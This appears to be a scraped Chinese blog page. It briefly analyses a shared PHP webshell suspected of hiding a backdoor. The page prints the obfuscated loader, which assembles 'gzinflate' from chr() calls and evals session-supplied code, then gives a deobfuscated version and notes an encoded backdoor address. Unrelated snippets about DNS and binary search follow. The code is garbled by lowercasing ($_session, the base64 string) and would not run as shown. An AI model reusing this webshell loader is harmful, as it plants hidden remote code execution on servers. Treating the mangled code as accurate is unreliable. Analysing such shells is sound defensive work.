有人分享了乙個php大馬(說是過waf),八成有後門,簡單分析了一次
<?php
$password='shiqi';//登入密碼(支援菜刀)
//----------功能程式------------------//
$c="chr";
session_start();
if(empty($_session['phpcode']))
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('mtax'));
@eval($un($_session['phpcode']));
?>
就是個簡單的基於base64加gzinflate加密
還原一下:
$password='shiqi';//登入密碼(支援菜刀)
//----------功能程式------------------//
session_start();
if(empty($_session['phpcode']))
$un = "gzinflate";
@eval($un($_session['phpcode']));
?>
後門部分:
在1416行
sfruudovl1dxvy5gqunf**bpsy5dqy9lcnjvci5waha/bmftzt0=通過解碼得出後門位址
收藏
一款免殺php大馬的解密與去後門
然後把東西移動到虛擬機器裡面的php環境中,開啟一看,有加密,用的函式是 先用這個函式base64 decode 然後用這個函式gzuncompress 加密,好的是密文就一塊啊,然後把這一塊全部剪下 重新寫個php檔案 就這個簡單,吼吼 源 一覽無餘啊!看到源 後 ctrl f找這個 http 發...
對udp dns的一次思考
目前昨天查乙個線上問題 dns伺服器在我們的裝置,有大量的終端到裝置上請求解析網域名稱,但是一直是單執行緒,dns報文處理不過來 然而裝置是多核,dns伺服器一直不能利用多核資源,所以能不能使用多執行緒進行處理呢?udp不像tcp那樣,udp沒有連線的概念,也就是沒有通過建立多個連線來提高對dns伺...
對二分查詢程式的一次測試
本文內容 於 程式設計珠璣 第二版5.2節。先看一段程式 public class errirbinary public static int binarysearch int number return 1 param args public static void main string arg...